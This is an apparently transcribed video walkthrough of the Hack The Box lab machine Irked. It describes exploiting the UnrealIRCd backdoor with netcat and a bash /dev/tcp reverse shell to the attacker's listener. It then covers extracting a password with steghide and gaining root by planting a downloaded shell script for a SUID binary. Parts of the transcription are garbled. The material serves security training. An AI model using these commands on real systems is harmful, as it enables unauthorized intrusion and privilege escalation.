What up, hackers and cybersecurity enthusiasts? Today we're going to be taking a look at Irked. It's a Linux machine, easy difficulty. Irked is a pretty simple and straightforward box. It requires basic enumeration skills, and it also shows the need to scan all ports on machines and to investigate any out-of-place binaries found while enumerating the system. Related Academy modules include networking with Nmap, or network enumeration with Nmap using Metasploit framework, Linux privilege escalation, introduction to assembly language, Linux fundamentals, and file transfers. The other areas of interest include steganography, security tools, software and OS exploitation, and reverse engineering. Some vulnerabilities to take a look out for are clear text credentials and information disclosure. Let's go ahead and get started here. Now, I'd recommend creating a directory for each lab that you do, just to make it a little bit easier, and then we'll start off with a basic Nmap scan, in which we'll save our output to this directory. We'll also take a look at the website to see if anything's running on port 80. And it appears something is. So let's give it a minute to load here. Upon checking out port 80, we're brought to this little frown face, and it says IRC is almost working. This is a little bit of a hint, but let's go ahead and wait for the Nmap to come back just so we can see what's actually going on and what services are being ran. As far as the Nmap goes, here are the results. Now we're able to see that port 22 is open, running SSH. We're able to see port 80 running Apache HTTPD 2.4.10, and port 111 is running RPC bind, and port 6697 running IRCS, port 8067 running invaluable. Now, as we mentioned before, Pentest Monkeys gives us a little bit of some tips on how to pen test IRC services. And here under banner, we can see it's telling us that we can use NC or Netcat to resolve the DNS, basically. So we'll go ahead and run NC followed by the IP address and attempt to get a little bit more information about this host here. At this point, we're going to have to type in an artificial username and password in order to make it seem like we're logging into the system. And upon that, we are given some details about the services running. Well, we can see our host is irked.htb and it's running Unreal 3.2.8.1. That is a mouthful, huh? From here, we can begin to look for any exploits or known vulnerabilities associated with this service. Now we're brought to Rapid 7 and we have a backdoor command execution associated with Unreal here. Now this is a Metasploit module which we can try to take advantage of. Now here is a good time to mention that if the Metasploit module does not work, we can do the same thing with netcat and with ping. So we're going to go ahead and do that now. Ping-c. Alright, let's see here. So we can also use a Metasploit module to actually, and you should pause that, right? Yeah. Alright, so here, if the Metasploit module does not work, we can actually do the same thing using netcat, and we echo in the backdoor command when a connection is established to get executed, and that will give us the reverse shell we're looking for. Command we're going to be using is echo AB ping-c2 followed by the address of the target, as well as we're going to have to set up a listener here, which we have done on the right side. So here we'll type in the echo AB -C and we'll ping we'll start pinging our target and see if we can actually get the target to talk to us. We'll do echo AB ping-C followed by the target IP, grep to our netcat, which is set up, and we're gonna have our own machine here. All right, so we are going to then echo AB ping-C. We'll use our address first of our ton 0, and then we'll have it grep to the target here. So we're trying to speak to one another basically in order to get the shell. This should give us immediate command execution. All right, so we haven't registered, but it is working. Couldn't resolve your host name using your IP address. Instead, you have not registered. So I think we might have to use a username here. Give it like a username password kind of deal. I'm going to set up our listener and we will try again. We'll do NC dash. Actually, in this case, we're going to be using netcat as a listener. All right, we'll do NC-LVNP, port 9001, and we're now listening. So let's go ahead and try to ping our machine and try to get command execution. Now, the reason this works is because IRC chat is allowing users within the network or within these services to communicate with one another without authentication. If that command does not work for you, we have another command here, echo ab bash dash I and slash dev slash tcp file by time 0.9001 0 is less and greater 0 is less and 1, and then we're going to ping. Yeah, it's having a little bit of trouble resolving the host name again, but not an issue. We're going to try the command one more time, and we have received command execution, and here's our shell. So we have a shell. We've obtained a shell as ircd or irked at irked under Unreal 3.2, right? So let's go ahead and spawn a Python shell. That way it's a little bit more secure, a little bit more stable. We'll do python-c import putty.putty.spawn bin bash. And see if we can find any low-hanging fruit as well as a way for privilege escalation. Alright, so we're actually going to use the pwd command to print out directories. If that does not work, you could do lsla and we'll list all files here in directories. Alright, so if you've attempted to switch user to DJ Mav, the user we found here, might be skipping a few steps here again. Had some technical difficulties with this box, and instead of doing an unguided walkthrough, I figured I would just attempt to do a walkthrough anyway, no matter if it's a little bit less quality than the normal ones that I present to you guys. Now, in this case, if you were to try to check on the desktop and then like cat the user.txt, you're not going to be able to do that. Permission is denied. So we were going to cd into documents here. Cd into documents ls, and we have user.txt. Permission is denied. Now the funny thing about this is trying to do like lsla or to find other files here in the documents. So upon doing ls-la, we are able to see a dot backup here. If we cat the backup, we get this up, up, down, left, right, back, beep, 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 beep. We get this text here. So upon catting the backup, we get something that says super elite steg backup password. So as we checked the box before in the beginning and it mentions something about steganography, here's a good time to go into steganography. Now the only image we've found on this entire box so far is that little smiley face, which is on port 80. So right now we're going to try to download that file from the web server. So we navigate to port 80, we're brought to this Irked face, right? So if you just open in a new tab with strictly the image, it will give you the directory listing of the image. So it's irked.jpg, and we're going to have to set up a simple Python server in order to download this to our machine. So here, make sure that we're in a good directory. So we'll cd into the Irked directory, and here we're going to go ahead and curl this. So the command we're going to use is curl http followed by the target address of 10.10.10.117 and the directory of the image. So that's /irked.jpg, and we're going to output it as irked.jpg ls, and we've successfully downloaded the image. Now we'll try to open the image. It opens. Okay, not a big deal. However, if you try to do curl, you're not really going to trigger the login effect or the hidden parameters within the steganography. So we're going to have to just wget and set up a normal port 80 server on Python. That way it's mimicking it, and then the image and the steganography piece will be under the impression that it's being ran properly. Now, if you're unfamiliar with steganography or steghide, we have packages and dependencies that come with Kali Linux. And steghide is a steganography program which hides bits of data file and some of the least significant bits of another file in a way of existence not proven. It's designed to be portable and configurable. Let's go ahead and move on. Here we'll download steghide, sudo apt-y, install steghide. We run it packages, and we've successfully downloaded it. Now we're going to attempt to use the program to take a look at the image. You can do steghide-h for help, and this is going to give us a list of commands. See, and basically we can embed files, we can do it ourselves, we could also extract data from files, and the list goes on. At this point we'll use steghide and extract -sf followed by the image, so irked.jpg. And we're going to need a password for this file if we're going to be extracting data, as it's locked. So we'll use the password that we found previously. So we'll do -p, and we'll type in that up, down, bass, whatever it is. Row extracted data to pass.txt. So if we ls, so upon doing ls and catting to pass.txt, we are given another password in plain text. Try to use that password to log in for the user djmav, which is a user that we found on the system previously, but we did not have access to do anything with. At this point, we're going to SSH in, as we also saw that SSH was running. Let's just see if there's any low-hanging fruit in there. We'll SSH as djmav. We'll type in a password. And we successfully log in via SSH. Let's see if there's anything in here. Do ls-la to list all. We've got a user.txt around. Let's go ahead and cat this, see if we have permission now. We do. So we've got our first flag. That's fucking funny. Go ahead and save that for later on our little note. And let's find a privilege escalation route so that we can get in as admin and find the final route here. I'd like to take this time to go over a quick little privilege escalation technique here. Now, we could run like enum for Linux or something, or we could just not use that program and just search the file listings here to see if there's any SUIDs that have permissions. So what this command is going to do is we're going to run find type f dash perm minus 4000. It's going to allow us to access all files across the file system that have SUID bit set. So that's going to include binaries that when executed run with permissions of root and etc. So let's go ahead and see if that's actually possible here. You can ignore the top. We were just searching for like privileges and low-level binaries, privilege escalation routes before I decided just to use this command. So I'll find forward slash type F perm 4000, and we're going to get a list here. So user has been continuing on, and we see that like etc. SSL deny. However, something interesting sticks out that's not normally here, and that would be the user bin view user. All right, so this at this point we're going to try to list any files here in the directory. All right, so we'll do ls-la followed by the path to the binary here, which is user bin view user. And here we are presented with some information here. Read, write, execute, permissions. This is good news. Next, we're going to do view user. We're going to try to execute this since we have execution privilege. Not found. Application is being developed to set and test the user permissions. It's still being developed. That's actually a callback to the port 80 page where it tells you IRC is still being worked on. So in order to actually tell what this file is doing, we did have a little bit of background information, but if we were to type file followed by user bin view user, it's going to tell us that this is a 32-bit file. Alright, so typing in file will let us know or bring us to the realization this is a 32-bit file that is actually an executable, and we're going to execute it. Alright, so at this point, let's try to copy the source of this file to our machine so we can actually see what the binary is doing when it's executed. And then we'll be able to manipulate that and get privilege esc. So what we're going to want to do is scp So let's copy this binary and we'll run ltrace to see what it's actually doing. Alright, so in order to copy from SSH, we're going to run SCP followed by the username, so it's logged in via SSH, and then the path, and then the name of the file. So all in all, SCP DJ Mardov at 10.10.10.117 colon user bin view user, and the binary is view user. So let's go ahead and do that. At that point, we'll ask us for the password because it's attempting to log in and then copy it securely, essentially. So we'll just go ahead and copy paste that password so we don't have any errors. we successfully managed to get that. We'll do ls, and we have the view user file here. Now, at this point, we're going to need to run ltrace so that we can actually read that in plain text and see what's going on when this view user is binary is being executed. So we'll do vi view user base64 here. We're going to try to decrypt this into base64. So we'll copy this. Alright, so we're going to run, we tried to use like base64 for a long time and that didn't work. So the correct way to do this is just to use ltrace followed by period / view user or / view user. We'll perform ltrace followed by .view user. And it tells us this application is being developed. This application is being developed to set and test user permissions. It's still being actively developed, right? So no return signature child executed or exited. Set UIDs to 0 and system. It's checking the system / temp folder / list users, and it doesn't find anything. Now, what's going on here is that they've told us the file is still being developed, right? Now, assuming that they would have a list of users with permissions or however they were going to set this up, it would be some sort of fashion of that. If we were to put malicious code inside of this list users, then it will execute it. If we were to change permissions or grant permissions to a user as this is executed, it will then give that user within that file permissions, okay? In that case, it will escalate privileges for us. So, since it's going to execute anything inside this this list users, what is that? What is it? This fucking I'm getting a little sleepy here. So, since it's going to execute anything inside of this view user binary, we're going to put a Python shell in there. And then we're gonna grant that permission. So we're gonna overwrite this list users or this view users file with a Python shell, and then when the binary is executed, it will give us a Python shell with root access, as root is necessary to execute this binary. So essentially, if this was in the wild, you would wait until this was executed by admin or whoever. So here we can do vi list users on our machine, and we're going to create that. That will create the file of list users, right? And that will create the file of list users. So as you can see, we're going to do bin bash, Here you can see me trying to curl the file we just created from our machine to our target machine. However, I made the mistake of not being logged in. So we're going to go to the SSH for DJ Marv, and we'll curl the file. That way we can overwrite the list users. We'll curl HTTP 10.10.16.4 port 80, which is our machine / list users, and we were going to output that into list users again. This is overwriting it. And since curl doesn't work, we're going to use wget and basically do the same exact thing. Now the file should be downloaded. We were in the correct directory. We'll remove the other one as I made a slight mistake. And just to be sure, we cat the file, cat list users, and we have the bin bash shell, right? Well, this is good. Very good. Now, all we need to do is execute this, right? However, we need to give it permission so we can actually execute this within Irked. So we'll do chmod plus x with a file of temp list users. That gives us permission to execute files. And we're going to go ahead and do that. Now when we execute view user, since we have permission to do that, it's going to overwrite like we discussed before, and it will pop open that bin bash shell with privilege escalated. Slight issue here. Let's see, temp list users not found, files not found. Okay, hold on. Have a little bit of syntax error in the list users that we created, so just make sure that you don't do that. Now, if you aren't sure how we got the file into temp list users, you can download it, wget it to the machine, and then you can move it into that folder, no problem. So we'll move list users into the temp directory here, and then we'll be able to execute it by typing view users, and we are root. Now, due to the fact that this lab was a little bit complicated, I don't believe it's easy at all. I think that's probably the wrong difficulty setting for the amount of work we had to actually do here and the amount of services that aren't usually used. So, in the essence of time, or in just making life a lot easier, we're going to, in the essence of time, we'll cd just straight up into the root directory. As we know, that's where flags usually are. We have pass.txt and root.txt. We're going to cat root.txt, and we're going to be presented with the flag. So we'll cat root.txt, and here is the root flag. We'll go ahead and add this into our note, and that would be flag 1 and 2. Let's go ahead and enter this in. There's flag 1 and here's flag 2. Submit them both. Definitely not easy. We'll grab this first flag, as we had to reset the box at some point, and it kind of reset the flag for us. So we'll cat the user flag. This is the first flag, as we had to reset the machine. And we'll type that in, and thank you for watching. Please like, comment, subscribe, and I'd like to just leave a little comment here. Now, this one was pretty difficult, and I am not a pen tester by trade. However, I would like to be. So if you have any other tips or suggestions, feel free to drop a comment below, like, and subscribe. Thank you.